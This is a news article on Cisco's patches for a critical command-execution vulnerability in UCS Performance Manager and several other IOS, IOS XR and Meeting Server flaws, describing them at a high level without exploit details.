Cisco patches critical exposure in management software

Cisco has patched what it called a critical vulnerability in its Unified Computing System (UCS) Performance Manager software that could let an authenticated, remote attacker execute commands.

Cisco UCS Performance Manager versions 2.0.0 and prior are affected and the problem is resolved in Cisco UCS Performance Manager versions 2.0.1 and later. UCS Performance Manager collects information about UCS servers, network, storage, and virtual machines.

According to Cisco the vulnerability is due to insufficient input validation performed on parameters that are passed via an HTTP GET request. An attacker could exploit this vulnerability by sending crafted HTTP GET requests to an affected system. An exploit could allow the attacker to execute arbitrary commands with the privileges of the root user.

+More on Network World: What was hot at Cisco Live!+

Cisco has released software updates that address this vulnerability. Workarounds that address this vulnerability are not available, the company stated

The patch comes on the heels of a series of security fixes recently offered by Cisco. Earlier this month the company released patches for vulnerabilities in its IOS software for networking devices and the Cisco and WebEx conferencing servers.

According to an IDG News Service story, the most serious vulnerability affects the Cisco IOS XR software for the Cisco Network Convergence System (NCS) 6000 Series Routers. It can lead to a denial-of-service condition, leaving affected devices in a nonoperational state.

Unauthenticated, remote attackers could exploit the vulnerability by initiating a number of management connections to an affected device over the Secure Shell (SSH), Secure Copy Protocol (SCP) or Secure FTP (SFTP). Because it could affect the availability of a critical piece of equipment, like a router, Cisco rated this vulnerability as high severity. There is no workaround and customers are advised to install the newly released patches.

Another flaw fixed in the Cisco IOS XR software could let attackers execute arbitrary commands on the operating system with root privileges. This vulnerability affects IOS XR Software Release 6.0.1.BASE and was rated medium severity because the attacker needs to be authenticated as a local user.

A denial-of-service vulnerability was also fixed in the Cisco IOS Software. It can be used to crash devices running affected versions of the software by sending specially crafted Link Layer Discovery Protocol (LLDP) packets to them. Exploitation doesn’t require authentication, but requires the attacker to be in a position to send LLDP packets.

Cisco’s meeting servers were also patched, according to the IDG report. One vulnerability in the HTTP interface of the Cisco Meeting Server, formerly Acano Conferencing Server, could have allowed attackers to launch persistent cross-site scripting (XSS) attacks against users of the interface. Attackers could exploit this flaw by tricking users to click on maliciously crafted links and could then execute rogue JavaScript code in their browsers in the context of the Cisco Meeting Server interface. This could be used to steal authentication cookies or to force them to perform unauthorized actions.

Information from the the IDG News Service was used in this article.